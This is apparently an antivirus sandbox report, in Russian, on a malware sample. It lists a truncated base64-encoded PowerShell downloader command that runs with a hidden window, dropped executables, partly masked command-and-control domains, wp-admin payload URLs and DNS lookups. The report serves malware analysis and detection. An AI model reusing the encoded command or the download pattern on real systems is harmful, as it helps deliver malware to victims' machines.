Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB1AFUAQgBvADQAeABfAD0AKAAnAFUAQQBvAFgAJwArACcAMQAnACsAJwBHADQAQQAnACkAOwAkAFQARAA0AG8AQQBYAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\785137.cvr
- %HOMEPATH%\289.exe
- %HOMEPATH%\289.exe
- 'us##i.com':80
- '91###aphics.com':80
- 'ac###gger.com':80
- 'we###nie.com':80
- http://us##i.com/wp-admin/SKT62W/
- http://www.us##i.com/wp-admin/SKT62W/
- http://ac###gger.com/daUeX/
- http://we###nie.com/order/Wsc/hi0TV/
- DNS ASK us##i.com
- DNS ASK 91###aphics.com
- DNS ASK ac###gger.com
- DNS ASK we###nie.com
- DNS ASK wa##ma.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB1AFUAQgBvADQAeABfAD0AKAAnAFUAQQBvAFgAJwArACcAMQAnACsAJwBHADQAQQAnACkAOwAkAFQARAA0AG8AQQBYAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...' (со скрытым окном)